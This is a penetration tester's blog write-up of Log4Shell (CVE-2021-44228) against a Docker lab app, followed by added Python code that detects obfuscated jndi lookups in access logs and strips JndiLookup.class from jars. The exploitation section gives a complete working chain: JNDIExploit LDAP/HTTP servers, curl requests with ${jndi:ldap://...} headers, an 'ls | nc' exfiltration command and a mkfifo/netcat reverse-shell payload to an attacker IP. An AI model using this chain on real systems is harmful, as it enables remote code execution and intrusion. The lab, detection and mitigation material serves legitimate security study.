CVE-2021-44228: Log4Shell

Yara AlHumaidan (0xy37)
3 min read, Dec 16, 2021

Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)

For this exercise I will be targeting a Docker-hosted vulnerable Java (Spring Boot) application; you can find the lab here:

https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab

Exploitation:

First we base64-encode the command the target should run (`echo` appends a trailing newline, which is included in the encoding):

└──╼ #echo "ls | nc 172.20.10.2 80" | base64
bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=

Next we need to run the malicious LDAP server and the HTTP server that serves the class. The JNDIExploit jar below does all of the following:

  • Hosts the LDAP server.
  • Hosts the HTTP server.
  • Generates a .class file from the base64 payload when the victim requests it.

└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar
Error: The following option is required: [-i | --ip]
Usage: java -jar JNDIExploit-1.2-SNAPSHOT.jar [options]
Options:
* -i, --ip Local ip address
-l, --ldapPort Ldap bind port (default: 1389)
-p, --httpPort Http bind port (default: 8080)
-u, --usage Show usage (default: false)
-h, --help Show this help


└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.20.10.2 -l 1234 -p 800
[+] LDAP Server Start Listening on 1234...
[+] HTTP Server Start Listening on 800...

Now we trigger the bug with the curl command below. The application logs the value of the `X-Api-Version` header, so Log4j evaluates the `${jndi:...}` lookup inside it: the lookup points at the LDAP server we started in the previous step, and its path carries the base64-encoded command. The application itself still answers normally:

└──╼ #curl 172.17.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.20.10.2:1234/Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=}'
Hello, world!

The LDAP server receives the lookup from the victim and answers with a JNDI Reference whose codebase points at our HTTP server; the victim's JVM then fetches the generated .class from there and instantiates it, which runs the command. Note that this remote class loading only works because the lab's JDK still trusts LDAP codebases (`com.sun.jndi.ldap.object.trustURLCodebase`); JDK 8u191, 11.0.1 and later set it to false by default, and exploitation there needs a gadget class that is already on the victim's classpath instead of a remote one:

└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.20.10.2 -l 1234 -p 800
[+] LDAP Server Start Listening on 1234...
[+] HTTP Server Start Listening on 800...

[+] Received LDAP Query: Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=
[+] Paylaod: command
[+] Command: ls | nc 172.20.10.2 80

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo= with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo= redirecting to http://172.20.10.2:800/ExploitcjWF0rQsqL.class
[+] New HTTP Request From /172.17.0.2:55030 /ExploitcjWF0rQsqL.class
[+] Receive ClassRequest: ExploitcjWF0rQsqL.class
[+] Response Code: 200

The netcat listener on port 80 then receives the output of `ls` run inside the container:

└──╼ #nc -lvnp 80
listening on [any] 80 ...
connect to [172.20.10.2] from (UNKNOWN) [172.17.0.2] 33701
app
bin
dev
etc
home
lib
media
mnt
proc
root
run
sbin
srv
sys
tmp
usr
var

Getting Shell:

  • Create the payload:

└──╼ #echo "rm f;mkfifo f;cat f|sh -i 2>&1|nc 172.20.10.2 80 >f" | base64
cm0gZjtta2ZpZm8gZjtjYXQgZnxzaCAtaSAyPiYxfG5jIDE3Mi4yMC4xMC4yIDgwID5mCg==

  • Send the exploit:

└──╼ #curl 172.17.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.20.10.2:1234/Basic/Command/Base64/cm0gZjtta2ZpZm8gZjtjYXQgZnxzaCAtaSAyPiYxfG5jIDE3Mi4yMC4xMC4yIDgwID5mCg==}'

  • Finally, with the same `nc -lvnp 80` listener running, the target connects back and we get an interactive shell.
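The two curl requests above are exactly what a defender has to spot in the target's access logs. As an added example (my code, not from the post or the lab), the Python script below rebuilds the header value used above and then scans constructed log lines for the `${jndi:` lookup, expanding the nested `${lower:...}`, `${upper:...}` and `${...:-x}` lookups that attackers used to get past naive string matching. The log lines, hostnames and ports in `SAMPLE_LOG` are constructed for the example.

```python
import base64
import re

# Attacker side: the header value used in the post. `echo` appends a newline
# before piping into base64, so the newline is part of the encoded command.
def build_jndi_header(command: str, ldap_host: str, ldap_port: int) -> str:
    b64 = base64.b64encode((command + "\n").encode()).decode()
    return f"${{jndi:ldap://{ldap_host}:{ldap_port}/Basic/Command/Base64/{b64}}}"


# Defender side. Log4j expands nested lookups from the inside out before it
# ever sees the "jndi:" prefix, so a plain `${jndi:` string match misses
# payloads such as ${${lower:j}ndi:...} or ${${::-j}ndi:...}. Do the same
# inside-out expansion here and inspect each lookup body as it surfaces.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a lookup with no lookup inside it


def _expand(body: str) -> str:
    """Expand one innermost lookup body for the forms attackers use to hide
    the jndi prefix. Unknown lookups are replaced with "" (Log4j would leave
    them verbatim); that simplification errs toward flagging a line."""
    if ":-" in body:                      # ${env:NOPE:-j} and ${::-j} -> "j"
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep:
        if prefix.lower() == "lower":      # ${lower:J} -> "j"
            return arg.lower()
        if prefix.lower() == "upper":      # ${upper:j} -> "J"
            return arg.upper()
    return ""


def log4shell_lookup(text: str):
    """Return the expanded jndi lookup body if `text` carries one, else None."""
    s = text
    while True:
        matches = list(_INNERMOST.finditer(s))
        if not matches:
            return None
        for m in matches:
            if m.group(1).lower().startswith("jndi:"):
                return m.group(1)
        # Every innermost lookup is replaced by text without "${", so the
        # number of lookups strictly decreases and the loop terminates.
        s = _INNERMOST.sub(lambda m: _expand(m.group(1)), s)


def scan_access_log(lines):
    """Return [(line_number, jndi_body)] for every line carrying a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = log4shell_lookup(line)
        if found is not None:
            hits.append((n, found))
    return hits


# Constructed sample access log (not from the post): line 2 carries the post's
# own header value, lines 3 and 4 carry obfuscated variants seen in the wild.
SAMPLE_LOG = [
    '172.17.0.1 - - [16/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 13 "-" "curl/7.74.0"',
    '172.17.0.1 - - [16/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 13 "-" "'
    + build_jndi_header("ls | nc 172.20.10.2 80", "172.20.10.2", 1234) + '"',
    '10.0.0.9 - - [16/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 200 13 "-" "${${lower:j}ndi:ldap://10.0.0.5:1389/a}"',
    '10.0.0.9 - - [16/Dec/2021:10:00:04 +0000] "GET /login HTTP/1.1" 200 13 "-" "${${::-j}${::-n}${::-d}${::-i}:${lower:l}dap://10.0.0.5:1389/a}"',
    '172.17.0.1 - - [16/Dec/2021:10:00:05 +0000] "POST /api HTTP/1.1" 201 0 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for n, body in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {body}")
```

The scanner only sees what the web tier logged; if the payload arrived in a header that never reaches the access log, the application's own log is the place to run the same check.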

Mitigation:

The topology below (the figure is not reproduced in this text) shows where the attack can be mitigated at each step:
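As an added example, not part of the original post: the durable fix is upgrading log4j-core to a fixed release (2.15.0 closed this CVE; 2.16.0 and the 2.17.x releases close follow-on issues, so upgrade to the latest patched line). Where that cannot be done immediately, Apache's advisory recommends removing `org/apache/logging/log4j/core/lookup/JndiLookup.class` from log4j-core; setting `log4j2.formatMsgNoLookups=true` alone was later shown to be insufficient. The Python script below (my code, standard library only) finds log4j-core inside a jar, including jars nested in a Spring Boot fat jar like the lab's under `BOOT-INF/lib/`, reports the version Maven recorded in `pom.properties`, and writes a copy with `JndiLookup.class` removed. The jar it scans is constructed inline with placeholder class bytes and a sample version string, not the lab's real artifact.

```python
import io
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def log4j_core_version(zf: zipfile.ZipFile):
    """Version of log4j-core as recorded by Maven inside the jar, or None."""
    if POM_PROPS not in zf.namelist():
        return None
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_jar(data: bytes, path: str = "app.jar"):
    """Yield (path, version, has_jndi_lookup) for this jar and every jar nested
    inside it. Spring Boot fat jars keep dependencies as whole jars under
    BOOT-INF/lib/, so a scan of top-level entries alone misses log4j-core."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        has_lookup = JNDI_LOOKUP in names
        version = log4j_core_version(zf)
        if has_lookup or version is not None:
            yield (path, version, has_lookup)
        for name in names:
            if name.endswith(".jar"):
                yield from scan_jar(zf.read(name), f"{path}!/{name}")


def strip_jndi_lookup(data: bytes) -> bytes:
    """Copy of a log4j-core jar with JndiLookup.class removed (top-level
    entries only; for a fat jar, pull the nested jar out first, fix it, and
    rebuild the outer jar with your build tool)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_LOOKUP:
                dst.writestr(item, src.read(item.filename))
    return out.getvalue()


def nested_entry(data: bytes, name: str) -> bytes:
    """Raw bytes of one entry of a jar (used to pull a nested jar out)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


def build_sample_fat_jar(version: str = "2.14.1") -> bytes:
    """Constructed stand-in for a Spring Boot jar: an outer jar with a nested
    log4j-core jar under BOOT-INF/lib/ that still ships JndiLookup.class. The
    .class entries are placeholder bytes, not compiled classes, and the
    version string is a sample, not a claim about the lab's dependency."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe placeholder")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe placeholder")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("BOOT-INF/classes/application.properties", "server.port=8080\n")
        zf.writestr(f"BOOT-INF/lib/log4j-core-{version}.jar", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    fat = build_sample_fat_jar()
    for path, version, has_lookup in scan_jar(fat):
        state = "JndiLookup.class present" if has_lookup else "JndiLookup.class absent"
        print(f"{path}: log4j-core {version}: {state}")
```

Treat the version as the primary signal and the class presence as the stop-gap check: a patched 2.17.x jar still ships `JndiLookup.class` (with JNDI disabled by default), while an old jar with the class stripped is mitigated but still needs the upgrade.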

More vulnerable applications (screenshots not reproduced in this text):

Minecraft:

Ghidra:

Yara AlHumaidan (0xy37)

Penetration Testing Consultant | OSCP | OSWP | eWAPTXv2 | CRTP